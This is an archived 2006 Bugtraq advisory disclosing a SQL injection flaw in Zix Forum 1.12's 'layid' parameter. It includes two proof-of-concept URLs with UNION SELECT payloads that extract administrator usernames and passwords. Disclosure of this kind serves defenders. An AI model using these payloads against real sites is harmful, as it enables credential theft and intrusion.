[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
From: i6d@xxxxxxxxxxx
Date: 20 May 2006 12:34:25 -0000

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised 
before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in 
clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins
 where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins
 where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com

Prev by Date: cPanel OpenBaseDir Bypass
Next by Date: Re: XSS in orkut.com
Previous by thread: cPanel OpenBaseDir Bypass
Next by thread: Re: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Index(es):
- Date
- Thread